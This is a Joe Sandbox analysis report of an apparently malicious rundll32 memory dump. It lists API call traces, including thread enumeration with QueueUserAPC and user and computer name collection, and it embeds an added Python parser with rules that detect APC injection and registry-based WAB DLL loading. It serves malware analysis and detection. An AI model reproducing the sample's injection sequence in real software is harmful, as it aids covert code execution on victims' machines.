                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                                          • String ID: Software\Microsoft\WAB\DLLPath
                                                          • API String ID: 1628847533-3156921957
                                                          • Opcode ID: 008c5dec2dc631bbac8d0d9c40db1c91c6aa93e852f768dacf9514312f3b1921
                                                          • Instruction ID: 8b9f7d88144725cafe86ac159d16e262f8fbdf2497ef993c727e739b1e9afb66
                                                          • Opcode Fuzzy Hash: 008c5dec2dc631bbac8d0d9c40db1c91c6aa93e852f768dacf9514312f3b1921
                                                          • Instruction Fuzzy Hash: 7B218671900118FBCB21BBA5EC89CBEBF7DFB88760B150566F802B2110E7354E08DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
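Two of the entries above are worth more than a glance: the CreateToolhelp32Snapshot(4) / Thread32First / OpenThread(1F03FF) / QueueUserAPC / Thread32Next loop, which queues an APC into every thread the snapshot returns, and the RegOpenKeyA(HKLM, Software\Microsoft\WAB\DLLPath) / LoadLibraryA / GetProcAddress entry, which resolves the Windows Address Book DLL through the registry rather than by name. The following is an added example, not part of the Joe Sandbox report or of the sample: a small parser for the "API.MODULE(args), ref: ADDR" line format used in these listings, plus two rules that flag those behaviours from the parsed calls. The sample input is the two entries copied verbatim from this listing; the rule and helper names are this example's own. It assumes that sorting a function's own calls by call-site address recovers program order (the listing order is not always address order, as the RegCloseKey line shows), that 0x1F03FF is the pre-Vista THREAD_ALL_ACCESS mask the sample was built against, and that arguments the sandbox prints as "?" were simply not recovered.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Input: "APIs" lines of two function entries copied from this report's listing of
# the rundll32 dump at 0x05570000. Rule and helper names are this example's own.
APC_BLOCK = """\
• CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 05591E36
• CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 05591E42
• GetModuleHandleA.KERNEL32(?,059B9732,00000000,?,00000000), ref: 05591E62
• GetProcAddress.KERNEL32(00000000), ref: 05591E69
• Thread32First.KERNEL32(?,0000001C), ref: 05591E79
• OpenThread.KERNEL32(001F03FF,00000000,?), ref: 05591E94
• QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 05591EA5
• CloseHandle.KERNEL32(00000000), ref: 05591EAC
• Thread32Next.KERNEL32(?,0000001C), ref: 05591EB5
• CloseHandle.KERNEL32(?), ref: 05591EC1
"""
WAB_BLOCK = """\
• RegOpenKeyA.ADVAPI32(80000002,Software\\Microsoft\\WAB\\DLLPath,?), ref: 0558B481
• RegCloseKey.ADVAPI32(?), ref: 0558B539
  • Part of subcall function 05585EA9: RtlAllocateHeap.NTDLL(00000000,?,05586423), ref: 05585EB5
• LoadLibraryA.KERNEL32(00000000), ref: 0558B4CF
• GetProcAddress.KERNEL32(00000000,?), ref: 0558B4E8
• GetLastError.KERNEL32 ref: 0558B507
• FreeLibrary.KERNEL32(00000000), ref: 0558B519
• GetLastError.KERNEL32 ref: 0558B521
"""
# One line: [bullet] [Part of subcall function X:] API.MODULE[(args)][,] ref: ADDR
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$")
HEX_ARG = re.compile(r"^-?[0-9A-Fa-f]{8}$")
TH32CS_SNAPTHREAD = 0x4
THREAD_ALL_ACCESS_LEGACY = 0x1F03FF    # assumption: THREAD_ALL_ACCESS for _WIN32_WINNT < 0x0600
HKEY_LOCAL_MACHINE = 0x80000002
WAB_DLLPATH_KEY = "Software\\Microsoft\\WAB\\DLLPath"

@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Union[int, str, None]]  # None where the report shows "?"
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # callee address for "Part of subcall" lines

def parse_arg(tok: str) -> Union[int, str, None]:
    tok = tok.strip()
    if tok == "?":
        return None
    if HEX_ARG.match(tok):
        return int(tok, 16)            # int() accepts the leading '-' the report emits
    return tok                         # literal string argument such as a registry path

def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in filter(str.strip, text.splitlines()):
        m = API_LINE.match(line)
        if m is None:
            raise ValueError(f"unrecognised trace line: {line!r}")
        raw, sub = m.group("args"), m.group("sub")
        args = [parse_arg(t) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                             int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

def own_calls_by_address(calls: List[ApiCall]) -> List[ApiCall]:
    # Assumption: address order of the function's own calls is program order.
    return sorted((c for c in calls if c.subcall_of is None), key=lambda c: c.ref)

def in_order(names: List[str], pattern: List[str]) -> bool:
    it = iter(names)                   # subsequence test: each name found after the last
    return all(p in it for p in pattern)

def classify(calls: List[ApiCall]) -> List[str]:
    seq = own_calls_by_address(calls)
    names = [c.api for c in seq]
    tags = []
    # Snapshot -> Thread32First/Next -> OpenThread -> QueueUserAPC is the APC-queuing
    # loop; count it only when the snapshot really asked for threads.
    if in_order(names, ["CreateToolhelp32Snapshot", "Thread32First", "OpenThread",
                        "QueueUserAPC", "Thread32Next"]):
        snap = next(c for c in seq if c.api == "CreateToolhelp32Snapshot")
        opened = next(c for c in seq if c.api == "OpenThread")
        if snap.args and isinstance(snap.args[0], int) and snap.args[0] & TH32CS_SNAPTHREAD:
            tags.append("apc_queued_to_enumerated_threads")
        if opened.args and opened.args[0] == THREAD_ALL_ACCESS_LEGACY:
            tags.append("openthread_all_access")
    # HKLM\Software\Microsoft\WAB\DLLPath names the Windows Address Book DLL; reading
    # it and then LoadLibrary/GetProcAddress resolves that DLL at run time.
    for c in seq:
        if (c.api == "RegOpenKeyA" and len(c.args) >= 2 and c.args[0] == HKEY_LOCAL_MACHINE
                and c.args[1] == WAB_DLLPATH_KEY
                and in_order(names, ["RegOpenKeyA", "LoadLibraryA", "GetProcAddress"])):
            tags.append("wab_dll_resolved_from_registry")
            break
    return tags
```

classify(parse_trace(APC_BLOCK)) returns both APC tags and classify(parse_trace(WAB_BLOCK)) returns the WAB tag. The rules deliberately key on argument values (TH32CS_SNAPTHREAD, the HKLM handle, the exact key path) and not only on API names, since RtlAllocateHeap/memcpy/lstrlen style sequences like the other entries in this listing are too generic to flag; to extend this to a whole report, feed each entry's "APIs" block through parse_trace and keep the entries that come back with tags.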

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0557F7C5
                                                          • memset.NTDLL ref: 0557F7D9
                                                            • Part of subcall function 055750C7: RegQueryValueExA.KERNEL32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 055750FF
                                                            • Part of subcall function 055750C7: RtlAllocateHeap.NTDLL(00000000,?), ref: 05575113
                                                            • Part of subcall function 055750C7: RegQueryValueExA.ADVAPI32(00000000,055729E6,00000000,055729E6,00000000,?,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?), ref: 0557512D
                                                            • Part of subcall function 055750C7: RegCloseKey.ADVAPI32(00000000,?,00000000,00000000,?,?,055729E6,055729E6,?,05588593,?,055729E6,00000000), ref: 05575157
                                                          • GetCurrentThreadId.KERNEL32 ref: 0557F866
                                                          • GetCurrentThread.KERNEL32 ref: 0557F879
                                                          • RtlEnterCriticalSection.NTDLL(059BB148), ref: 0557F920
                                                          • Sleep.KERNEL32(0000000A), ref: 0557F92A
                                                          • RtlLeaveCriticalSection.NTDLL(059BB148), ref: 0557F950
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557F97E
                                                          • HeapFree.KERNEL32(00000000,00000018), ref: 0557F991
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                                          • String ID:
                                                          • API String ID: 1146182784-0
                                                          • Opcode ID: c4422bbb4415c14a2cb2a8e164f68c15873cfa331edbfa1b9c5c51c5cb6f1cef
                                                          • Instruction ID: d4c69fbf638764264abbf7036fd63b607b030b804b8f2df64b4b9a085746fab2
                                                          • Opcode Fuzzy Hash: c4422bbb4415c14a2cb2a8e164f68c15873cfa331edbfa1b9c5c51c5cb6f1cef
                                                          • Instruction Fuzzy Hash: D95128B151834AAFD710DF65E88592BBBE9FB88244F41492EF485D3210EB34ED489B92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05584045: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0558404D
                                                            • Part of subcall function 05584045: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05584062
                                                            • Part of subcall function 05584045: InterlockedIncrement.KERNEL32(0000001C), ref: 0558407B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0558D44F
                                                          • memset.NTDLL ref: 0558D460
                                                          • lstrcmpi.KERNEL32(?,?), ref: 0558D4A0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0558D4CC
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0558D4E0
                                                          • memset.NTDLL ref: 0558D4ED
                                                          • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0558D506
                                                          • memcpy.NTDLL(-00000005,?,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 0558D529
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0558D546
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                                          • String ID:
                                                          • API String ID: 694413484-0
                                                          • Opcode ID: acc4a69b7015588793e85cfbce6f036759dda62568396807a274a386d779d4a3
                                                          • Instruction ID: cd5f7aac8cb95b8e454fb9af5ed2e6c6363a0b1dd65690b74aae4e076c581a83
                                                          • Opcode Fuzzy Hash: acc4a69b7015588793e85cfbce6f036759dda62568396807a274a386d779d4a3
                                                          • Instruction Fuzzy Hash: A141A271E00209EFDB10EFA4DC85AADBBF9FB44314F15402AE515B7290EB79AA489B50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000), ref: 05588D60
                                                          • lstrlen.KERNEL32(?), ref: 05588D68
                                                          • lstrlen.KERNEL32(?), ref: 05588DD3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 05588DFE
                                                          • memcpy.NTDLL(00000000,00000002,?), ref: 05588E0F
                                                          • memcpy.NTDLL(00000000,?,?), ref: 05588E25
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 05588E37
                                                          • memcpy.NTDLL(00000000,055963D8,00000002,00000000,?,?,00000000,?,?), ref: 05588E4A
                                                          • memcpy.NTDLL(00000000,?,00000002), ref: 05588E5F
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memcpy$lstrlen$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3386453358-0
                                                          • Opcode ID: eeeebc79597a298a93c1bf833a392ca30d5c51971034df0866b4f3927a171112
                                                          • Instruction ID: 48a76aa6166d22c30232fc3f5df882f42927e20a18b5a215693b0b3df1192eb0
                                                          • Opcode Fuzzy Hash: eeeebc79597a298a93c1bf833a392ca30d5c51971034df0866b4f3927a171112
                                                          • Instruction Fuzzy Hash: 68413D72E0021AEFCF10DFA4DC85AAEBBB9FF48354F144456E915B7201E731AA54DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 05584045: RtlEnterCriticalSection.NTDLL(0559C328), ref: 0558404D
                                                            • Part of subcall function 05584045: RtlLeaveCriticalSection.NTDLL(0559C328), ref: 05584062
                                                            • Part of subcall function 05584045: InterlockedIncrement.KERNEL32(0000001C), ref: 0558407B
                                                          • RtlAllocateHeap.NTDLL(00000000,055784D3,00000000), ref: 0557CA9A
                                                          • lstrlen.KERNEL32(00000008,?,?,?,055784D3,00000000), ref: 0557CAA9
                                                          • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 0557CABB
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,055784D3,00000000), ref: 0557CACB
                                                          • memcpy.NTDLL(00000000,00000000,055784D3,?,?,?,055784D3,00000000), ref: 0557CADD
                                                          • lstrcpy.KERNEL32(00000020), ref: 0557CB0F
                                                          • RtlEnterCriticalSection.NTDLL(0559C328), ref: 0557CB1B
                                                          • RtlLeaveCriticalSection.NTDLL(0559C328), ref: 0557CB73
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 3746371830-0
                                                          • Opcode ID: 26867a5db7fb26bd55ff401bc54666a3c11ca1d45132e14884b1504cde171446
                                                          • Instruction ID: 1ec2d921121af07c0ef87bd36b10a0378d3832dde12af19e97093d2bfbfecabb
                                                          • Opcode Fuzzy Hash: 26867a5db7fb26bd55ff401bc54666a3c11ca1d45132e14884b1504cde171446
                                                          • Instruction Fuzzy Hash: 914168B1510709EFCB21DF68E885B6ABFF4FB08351F11452AF80A97200DB39AD58DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055761CF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05576201
                                                            • Part of subcall function 055761CF: HeapFree.KERNEL32(00000000,00000000,?,?,05588D21,?,00000022,?,?,?,?,?,?,?,?,?), ref: 05576226
                                                            • Part of subcall function 05578568: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0557DBAC,?,?,?,?,?,00000022,00000000,00000000), ref: 055785A4
                                                            • Part of subcall function 05578568: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0557DBAC,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 055785F7
                                                          • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0557DBE1
                                                          • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0557DBE9
                                                          • lstrlen.KERNEL32(?), ref: 0557DBF3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0557DC08
                                                          • wsprintfA.USER32 ref: 0557DC44
                                                          • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0557DC63
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557DC78
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0557DC85
                                                          • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000), ref: 0557DC93
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                                          • String ID:
                                                          • API String ID: 168057987-0
                                                          • Opcode ID: 25f9de0918125e74197f2ddff2bdb7571421408418371365aa039856044224f5
                                                          • Instruction ID: 7ae5ab3d0f6de3ad4ef4b330b4d519a3628905d1548c1ab432af38a552bc71fd
                                                          • Opcode Fuzzy Hash: 25f9de0918125e74197f2ddff2bdb7571421408418371365aa039856044224f5
                                                          • Instruction Fuzzy Hash: 1131D03160431AAFDB21AF65EC49E5FBFE8FF84350F01092AF544A2191DB748818DBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,05593D7C), ref: 0558C49B
                                                          • GetLastError.KERNEL32 ref: 0558C4A5
                                                          • WaitForSingleObject.KERNEL32(000000C8), ref: 0558C4CA
                                                          • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 0558C4EB
                                                          • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 0558C513
                                                          • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0558C528
                                                          • SetEndOfFile.KERNEL32(00000006), ref: 0558C535
                                                          • GetLastError.KERNEL32 ref: 0558C541
                                                          • CloseHandle.KERNEL32(00000006), ref: 0558C54D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                                          • String ID:
                                                          • API String ID: 2864405449-0
                                                          • Opcode ID: 056b373505480f1d8ea422aa66c7cc13c64b359d981935d305be647c6b2a48b7
                                                          • Instruction ID: 903952c7d4df8987ff39d44b1b4a12ae7fbd1bc248efd9598d85d7825daca0e1
                                                          • Opcode Fuzzy Hash: 056b373505480f1d8ea422aa66c7cc13c64b359d981935d305be647c6b2a48b7
                                                          • Instruction Fuzzy Hash: A6318C70910209ABDF109FA4DD4ABBE7FB9FB04316F108156F911FA1A0C7788E58AB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,0558A266,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 05590AF2
                                                          • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 05590B26
                                                          • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 05590B2E
                                                          • GetLastError.KERNEL32 ref: 05590B38
                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 05590B54
                                                          • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 05590B6D
                                                          • CancelIo.KERNEL32(?), ref: 05590B82
                                                          • CloseHandle.KERNEL32(?), ref: 05590B92
                                                          • GetLastError.KERNEL32 ref: 05590B9A
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                                          • String ID:
                                                          • API String ID: 4263211335-0
                                                          • Opcode ID: 0d20ec98fd3eeae376fef02887517bafd2e6c8f28b889c10c273e29258eba6ac
                                                          • Instruction ID: 0f079627102ed675136ed7f4a38c5c211ead08a7c208a366a0ca06985efc55a9
                                                          • Opcode Fuzzy Hash: 0d20ec98fd3eeae376fef02887517bafd2e6c8f28b889c10c273e29258eba6ac
                                                          • Instruction Fuzzy Hash: 8F217F36911118FFCF009FA8D889CEE7F7AFB44355F018822F916D21A1DB389648DBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0557D52C
                                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 0557D542
                                                          • _snwprintf.NTDLL ref: 0557D567
                                                          • CreateFileMappingW.KERNEL32(000000FF,0559C1A8,00000004,00000000,00001000,?,?,54D38000,00000192), ref: 0557D583
                                                          • GetLastError.KERNEL32 ref: 0557D595
                                                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 0557D5AC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0557D5CD
                                                          • GetLastError.KERNEL32 ref: 0557D5D5
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                          • String ID:
                                                          • API String ID: 1814172918-0
                                                          • Opcode ID: 755cb885ef00d0a0899fe9cdea4e5ef936b7e3921d78ac5eda9900b25c157aa4
                                                          • Instruction ID: 39b967f48581ebd5a42f5eabed67ad2d75705ccdd9aafbbb02aecd4d6b7d1761
                                                          • Opcode Fuzzy Hash: 755cb885ef00d0a0899fe9cdea4e5ef936b7e3921d78ac5eda9900b25c157aa4
                                                          • Instruction Fuzzy Hash: C121E772601218BBDB11DF54DC46F9D7BB9BF84754F154022F606E71C0DE74A6089B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?), ref: 05576920
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 05576943
                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 0557694B
                                                          • lstrlenW.KERNEL32(00000000,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?,?,059B99A0,?), ref: 05576996
                                                          • memcpy.NTDLL(00000000,?,?,?), ref: 055769FE
                                                          • LocalFree.KERNEL32(?,?), ref: 05576A15
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
                                                          • String ID: P
                                                          • API String ID: 3649579052-3110715001
                                                          • Opcode ID: f8687f4acd7040fa5057f5302c6f7aeab7a958074309188cd278c087b64b83f8
                                                          • Instruction ID: 869803f3844e3875e74699ce625c1fbc32faa9c5205d18fa84aa1d0c2f879d07
                                                          • Opcode Fuzzy Hash: f8687f4acd7040fa5057f5302c6f7aeab7a958074309188cd278c087b64b83f8
                                                          • Instruction Fuzzy Hash: 7B616B71A1060EEFDF10EFA5EC89DAE7BBDFF44304B158026F505A7211DB3999099BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 055783D0: RegCreateKeyA.ADVAPI32(80000001,059BA7F0,059BB184), ref: 055783E5
                                                            • Part of subcall function 055783D0: lstrlen.KERNEL32(059BA7F0,00000000,00000000,0559B072,?,?,?,05581876,00000001,00000000,059BB184), ref: 0557840E
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A487
                                                          • RtlAllocateHeap.NTDLL(00000000,00000105), ref: 0558A49F
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A501
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0558A515
                                                          • WaitForSingleObject.KERNEL32(00000000,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A567
                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A590
                                                          • HeapFree.KERNEL32(00000000,05572EFF,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A0
                                                          • RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,05572EFF,0557B352,?,00000001), ref: 0558A5A9
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocateFree$CloseCreateObjectSingleWaitlstrlen
                                                          • String ID:
                                                          • API String ID: 3503961013-0
                                                          • Opcode ID: c9435945715bf596dc84932bc65ebc2074cb1be61ab23658756d28024a4e61ec
                                                          • Instruction ID: 02f5bb9de285e60208b3a1d39546cb3fdf33c792f8d5ebd3c6deeea74ebad061
                                                          • Opcode Fuzzy Hash: c9435945715bf596dc84932bc65ebc2074cb1be61ab23658756d28024a4e61ec
                                                          • Instruction Fuzzy Hash: 7841D5B1D0010AEFDF119F95DD858FEBFBAFB08264F11846AE511B2210D7359A98EF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,05572BA1), ref: 05585FD3
                                                          • wsprintfA.USER32 ref: 05585FFB
                                                          • lstrlen.KERNEL32(?), ref: 0558600A
                                                            • Part of subcall function 0557231D: RtlFreeHeap.NTDLL(00000000,?,0557D1F9,?,00000000,751881D0,00000000,?,?,?,055756D1,?,00000000,00000000), ref: 05572329
                                                          • wsprintfA.USER32 ref: 0558604A
                                                          • wsprintfA.USER32 ref: 0558607F
                                                          • memcpy.NTDLL(00000000,?,?), ref: 0558608C
                                                          • memcpy.NTDLL(00000008,055963D8,00000002,00000000,?,?), ref: 055860A1
                                                          • wsprintfA.USER32 ref: 055860C4
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Timememcpy$FileFreeHeapSystemlstrlen
                                                          • String ID:
                                                          • API String ID: 2937943280-0
                                                          • Opcode ID: be367d5b8af7ad8dbcf2a877323ce8ca5f24b04616172718ac89ecdf8d353c92
                                                          • Instruction ID: a8315fdb03d627781571cc79c58f58bddb6872d643fd654802162b038d468cf9
                                                          • Opcode Fuzzy Hash: be367d5b8af7ad8dbcf2a877323ce8ca5f24b04616172718ac89ecdf8d353c92
                                                          • Instruction Fuzzy Hash: 7D413E71A0020AEFCB10EFA9D885EAAB7FCFF48308B154455F519E7211EB35EA05DB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,055818B5), ref: 0558C169
                                                          • RtlAllocateHeap.NTDLL(00000000,055818B5), ref: 0558C180
                                                          • GetUserNameW.ADVAPI32(00000000,055818B5), ref: 0558C18D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,055818B5,?,05591CC9,059BB184,74ECC740,00000000,05581A7A), ref: 0558C1B3
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0558C1DA
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0558C1EE
                                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 0558C1FB
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0558C21E
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapName$AllocateComputerFreeUser
                                                          • String ID:
                                                          • API String ID: 3239747167-0
                                                          • Opcode ID: 71f9c3a1c6cf03dcfb46a231331dba87b9b2ef4bbbff948cd399928dc144ee34
                                                          • Instruction ID: 5e50ef1b9b7731c67178442186ee9ed79b26d8b502ef2e3620788e8c6c67c374
                                                          • Opcode Fuzzy Hash: 71f9c3a1c6cf03dcfb46a231331dba87b9b2ef4bbbff948cd399928dc144ee34
                                                          • Instruction Fuzzy Hash: 78313272A14205EFEB10DFA5DCC5A7EBBF9FB44210F12846AE445E7240EB34ED449B20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 05576600
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05576612
                                                          • wcstombs.NTDLL ref: 05576620
                                                          • lstrlen.KERNEL32(00000000), ref: 05576644
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 05576659
                                                          • mbstowcs.NTDLL ref: 05576666
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05576678
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 05576692
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
